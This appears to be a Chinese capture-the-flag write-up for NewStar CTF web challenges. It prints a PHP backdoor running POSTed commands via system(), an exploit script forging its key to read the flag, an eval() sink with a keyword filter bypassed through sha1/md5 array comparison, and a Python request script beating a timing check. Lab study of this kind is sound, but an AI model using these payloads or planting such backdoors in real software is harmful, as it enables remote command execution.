New-Star-Ctf-[Week1&2-Web]

听说NewStar的质量很高,没有做真是可惜了,现在在xdu的平台上进行复现

智械危机

robots.txt->backd0or.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

function execute_cmd($cmd) {
    system($cmd);
}

function decrypt_request($cmd, $key) {
    $decoded_key = base64_decode($key);
    $reversed_cmd = '';
    for ($i = strlen($cmd) - 1; $i >= 0; $i--) {
        $reversed_cmd .= $cmd[$i];
    }
    $hashed_reversed_cmd = md5($reversed_cmd);
    if ($hashed_reversed_cmd !== $decoded_key) {
        die("Invalid key");
    }
    $decrypted_cmd = base64_decode($cmd);
    return $decrypted_cmd;
}

if (isset($_POST['cmd']) && isset($_POST['key'])) {
    execute_cmd(decrypt_request($_POST['cmd'],$_POST['key']));
}
else {
    highlight_file(__FILE__);
}
?>

分析一下,Post传入cmd和key,先将这两个变量进行decrypt_request再执行execute_cmd,那么显然cmd是我们执行的命令,下面分析decrypt_request函数

$decoded_key是base64解码后的$key,$reversed_cmd = ‘ ‘ ;,先定义了一个空字符串$reversed_cmd,$reversed_cmd是$cmd反转之后的结果,而且$hashed_reversed_cmd,是md5加密的$reversed_cmd,必须要保证$hashed_reversed_cmd == $decoded_key,最终返回的$decrypted_cmd是cmd的base64解码,也是我们要执行的命令

以cat /f*为最终的命令,我们进行倒推,写一个exp即可

1
2
3
4
5
6
7
8
9
10
<?php
$decrypted_cmd = '';
$cmd = base64_encode($decrypted_cmd);
$reversed_cmd = strrev($cmd); //strrev是用于反转字符串的函数
$hashed_reversed_cmd = md5($reversed_cmd);
$decoded_key = $hashed_reversed_cmd;
$key = base64_encode($decoded_key);

echo "cmd=$cmd&key=$key" ;
?>

headache3

flag在响应包的头部

image-20241204112250377

会赢吗

Level1:在源代码中

Level2:

你能在一秒内打出八句英文吗

写一个脚本即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import requests
from bs4 import BeautifulSoup

# 定义目标URL
start_url = "http://127.0.0.1:60167/start"
submit_url = "http://127.0.0.1:60167/submit"

# 模拟GET请求,获取响应以及cookie
response = requests.get(start_url)

# 提取cookie
cookies = response.cookies
session_cookie = cookies.get('session')

# 使用BeautifulSoup解析HTML并提取所有英文句子
soup = BeautifulSoup(response.text, 'html.parser')
text_paragraph = soup.find(id='text')

# 设置请求头和cookie
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36',
    'Referer': start_url,
    'Accept-Encoding': 'gzip, deflate, br, zstd',
    'Content-Type': 'application/x-www-form-urlencoded',
}

# 设置POST请求的data
data = {
    'user_input': text_paragraph,
}

# 将cookie添加到请求中
cookies = {
    'session': session_cookie,
}

# 发送POST请求
submit_response = requests.post(submit_url, headers=headers, data=data, cookies=cookies)

# 输出响应内容
print(submit_response.text)
image-20241204122920682

遗失的拉链

www.zip源码泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
error_reporting(0);
//for fun
if(isset($_GET['new'])&&isset($_POST['star'])){
    if(sha1($_GET['new'])===md5($_POST['star'])&&$_GET['new']!==$_POST['star']){
        //欸 为啥sha1和md5相等呢
        $cmd = $_POST['cmd'];
        if (preg_match("/cat|flag/i", $cmd)) {
            die("u can not do this ");
        }
        echo eval($cmd);
    }else{
        echo "Wrong";

    } 
}

sha1和md5都不能处理数组,在强比较条件下,都会被转化为NULL,所以是相等的,下面一个也很简单绕过

image-20241204114939530